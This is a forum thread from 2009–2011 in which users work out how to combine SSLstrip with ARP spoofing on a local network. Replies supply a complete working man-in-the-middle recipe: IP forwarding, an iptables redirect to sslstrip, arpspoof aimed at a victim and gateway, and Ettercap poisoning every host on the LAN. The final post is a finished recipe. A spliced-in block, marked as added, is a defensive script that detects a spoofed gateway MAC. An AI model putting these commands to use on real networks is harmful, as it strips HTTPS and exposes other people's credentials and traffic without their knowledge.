uberleethax0r Posted December 6, 2009

Howdy all! I recently started watching Hak5, and have started to be a little more paranoid about my own online security. I want to try out some of the projects for myself, just to get a sense of network security. I have been working on getting SSLstrip to work on my own Windows computers, but I'm having a little trouble.

So, I can get SSL strip to work properly if I set the target machine's Firefox settings to listen to the hacker machine's port that I forwarded, as an HTTP proxy. Obviously, no man in the middle attack victims will have their proxy set that way, so I want to try ARP spoofing. I can get Arp spoofing to properly send traffic from the target computer through mine, using Ettercap or Arpspoof, but for some reason, SSLstrip doesn't work using it. Anyone know how to fix that?

uberleethax0r (Author) Posted December 6, 2009

Whoops, sorry if I posted this topic in the wrong section. I guess I didn't read it properly.

thefatmoop Posted December 9, 2009

I was thinking the same thing... using an ssl strip on just 1 person is pointless. SSL stripping on a highly active line is more realistic.

uberleethax0r (Author) Posted December 12, 2009

> I was thinking the same thing... using an ssl strip on just 1 person is pointless. SSL stripping on a highly active line is more realistic.

Er, yeah. I kinda think you missed the point. What I'm saying is how do you get sslstrip to work with arp poisoning? Like, instead of setting the victim's Firefox HTTP proxy to 192.168.1.2:80, etc.

taiyed14 Posted December 12, 2009

Just out of curiosity, how are you running arpspoof and sslstrip on Windows?

uberleethax0r (Author) Posted December 13, 2009

http://sourceforge.net/projects/arpspoof/ for the arpspoof Windows binary, Python with Python libraries for sslstrip, and http://kennethxu.blogspot.com/2006/04/java...forwarding.html for port forwarding.

thefatmoop Posted December 13, 2009

> Er, yeah. I kinda think you missed the point. What I'm saying is how do you get sslstrip to work with arp poisoning? Like, instead of setting the victim's Firefox HTTP proxy to 192.168.1.2:80, etc.

...

taiyed14 Posted December 14, 2009

You should be able to give arpspoof a wild card operator.

    arpspoof -t thegateway *

uberleethax0r (Author) Posted December 14, 2009

> You should be able to give arpspoof a wild card operator.
>
>     arpspoof -t thegateway *

As in, arpspoof everyone in the subnet? Does that work? Anyway, what does that do for me? Like arpspoof -t 192.168.1.* 192.168.1.1 or variant? In every variant of that, it just gives back an error and doesn't do anything.

uberleethax0r (Author) Posted December 22, 2009

So, anyone got any ideas?

taiyed14 Posted December 22, 2009

    $ man arpspoof

    SYNOPSIS
        arpspoof [-i interface] [-t target] host

    <SNIP>

    OPTIONS
        -i interface
            Specify the interface to use.

        -t target
            Specify a particular host to ARP poison (if not specified, all hosts on the LAN).

        host
            Specify the host you wish to intercept packets for (usually the local gateway).

uberleethax0r (Author) Posted December 23, 2009

Dang, that's scary that that works... Someone can actually make everybody on the LAN think their computer is a gateway.. As far as I can tell, that arpspoofing seems to work flawlessly.

HOWEVER: I DON'T CARE ABOUT ARPSPOOFING EVERYONE ON A LAN! Why does SSLstrip not work when arpspoof-ified? Arpspoofing and SSLstrip each work on their own, but not together. Also, how do I get that to work?

I guess I didn't explain my question very well, but anyone get it now? Has anyone had this trouble? I followed the instructions exactly from Hak5, but the sslstrip-age doesn't work without specifically declaring the target computer to follow the port sslstrip listens on.

taiyed14 Posted December 23, 2009

I've had no issues.

config iptables to forward traffic on port 80 to 8080
start sslstrip -l 8080
start arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

http://www.thoughtcrime.org/software/sslstrip/

It's pretty simple.

uberleethax0r (Author) Posted December 23, 2009

> I've had no issues.
>
> config iptables to forward traffic on port 80 to 8080
> start sslstrip -l 8080
> start arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
>
> http://www.thoughtcrime.org/software/sslstrip/
>
> It's pretty simple.

Okay, ah well.. Thanks for the info..

uberleethax0r (Author) Posted December 28, 2009

K, so, I tried it in three operating systems: Windows, Backtrack (which is a butt; it took me hours to get my wireless card working with ndiswrapper, but that's another story) and Ubuntu, although I don't see why it would matter. I also tested it on three different LANs just to make sure it wasn't my gateway noticing it somehow.

So, first enable IP forwarding in the sysctl configuration, and then

    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

and then

    sudo python sslstrip.py -l 8080

Arpspoofing:

    sudo arpspoof -i eth1 -t 192.168.0.5 192.168.0.1

/me doesn't get why it doesn't work. It works perfectly when I set an http proxy to the hax0r computer on port 8080, but arpspoofing doesn't work. We haven't made any progress on this forum thread. (No offense to you that answered - thank you.) Anyone got ideas?

taiyed14 Posted December 28, 2009

I don't understand what you mean when you say 'it doesn't work'. What doesn't work? sslstrip or arpspoof?

192.168.0.5 is the computer you want to trick
192.168.0.1 is the gateway you want to impersonate

What is the MAC address of the gateway and of the computer you're running arpspoof on? Now check the target computer. What does it THINK the MAC address of the gateway is?

    arp -a

uberleethax0r (Author) Posted December 28, 2009

> I don't understand what you mean when you say 'it doesn't work'. What doesn't work? sslstrip or arpspoof?
>
> 192.168.0.5 is the computer you want to trick
> 192.168.0.1 is the gateway you want to impersonate
>
> What is the MAC address of the gateway and of the computer you're running arpspoof on? Now check the target computer. What does it THINK the MAC address of the gateway is?
>
>     arp -a

They both work on their own. Arpspoofing properly makes the target think that the gateway is the mac address of the hax0r computer, but it doesn't strip ssl.

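The `arp -a` check discussed in the two posts above, seen from the side of a machine that wants to notice the spoofing (an added example, not part of the original thread): this Python sketch parses `arp -a` output in both Windows and Linux formats and flags a gateway entry whose MAC differs from a known-good value or is shared with another host. The MAC addresses and the 192.168.0.6 host are constructed sample values; the function names are hypothetical.

```python
import re
from collections import defaultdict

# IPv4 address followed by a MAC written with ':' (Linux/BSD) or '-' (Windows).
ENTRY = re.compile(
    r"\(?(\d{1,3}(?:\.\d{1,3}){3})\)?[ \t]+(?:at[ \t]+)?"
    r"((?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2})\b"
)

def norm(mac):
    return mac.lower().replace("-", ":")

def parse_arp_table(text):
    """Return {ip: mac} for the unicast entries in `arp -a` output."""
    table = {}
    for ip, mac in ENTRY.findall(text):
        mac = norm(mac)
        if not int(mac[:2], 16) & 1:   # group bit set = broadcast/multicast, skip
            table[ip] = mac
    return table

def check_gateway(table, gateway_ip, known_mac=None):
    """Return a list of (code, detail) findings for the gateway's ARP entry."""
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return [("NO_ENTRY", gateway_ip)]
    findings = []
    if known_mac and gw_mac != norm(known_mac):
        findings.append(("MAC_CHANGED", gw_mac))   # differs from recorded value
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    others = sorted(ip for ip in by_mac[gw_mac] if ip != gateway_ip)
    if others:   # another LAN host answers with the same MAC as the gateway
        findings.append(("MAC_SHARED", ",".join(others)))
    return findings

# Constructed sample output: IPs follow the thread, MACs are made up.
WINDOWS_SAMPLE = """\
Interface: 192.168.0.5 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           02-00-00-00-00-66     dynamic
  192.168.0.6           02-00-00-00-00-66     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
"""
LINUX_SAMPLE = "? (192.168.0.1) at 02:00:00:00:00:01 [ether] on eth0\n"

if __name__ == "__main__":
    print(check_gateway(parse_arp_table(WINDOWS_SAMPLE), "192.168.0.1", "02:00:00:00:00:01"))
```
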
The Game Posted January 10, 2010

Better off running up a Linux VMware, i.e. BackTrack. Save you a lot of hassle. It's like 5 steps to get this working, very simple. Sends everything in clear text to a logfile. I've had no issues with it.

myswordnu Posted January 23, 2010

Sorry, wrong topic. Couldn't find anywhere to delete my reply, so yeah lol

stewman Posted June 3, 2011

I know this is an old post, but was wondering if you ever found a solution to your problem. I am experiencing the exact same issue.

nykon Posted June 6, 2011 (edited)

Flip your box into forwarding mode:

    echo "1" > /proc/sys/net/ipv4/ip_forward

Setup iptables to redirect HTTP traffic to sslstrip:

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Launch Ettercap:

    ettercap -i <interface> -TqM ARP:REMOTE // //

Run sslstrip:

    sslstrip -a -l <listenPort>

Sorted.